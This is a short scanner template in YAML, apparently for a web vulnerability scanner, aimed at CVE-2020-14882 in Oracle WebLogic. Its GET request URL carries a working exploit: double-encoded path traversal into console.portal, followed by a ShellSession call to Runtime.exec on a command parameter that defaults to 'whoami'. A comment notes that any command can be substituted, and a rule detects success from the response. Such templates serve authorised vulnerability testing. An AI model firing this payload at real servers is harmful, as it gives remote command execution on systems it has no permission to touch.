id: CVE-2020-14882 info: name: Weblogic RCE GET request Probing - (CVE-2020-14882) risk: Critical params: - root: '{{.BaseURL}}' # use -p 'cmd=your_command' - cmd: 'whoami' requests: - method: GET redirect: false url: >- {{.root}}//console/css/%252e%252e%252fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('{{.cmd}}')") detections: - >- StatusCode() == 200 && StringSearch("response", "wls.console") && StringSearch("resHeaders","ADMINCONSOLESESSION") reference: - link: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf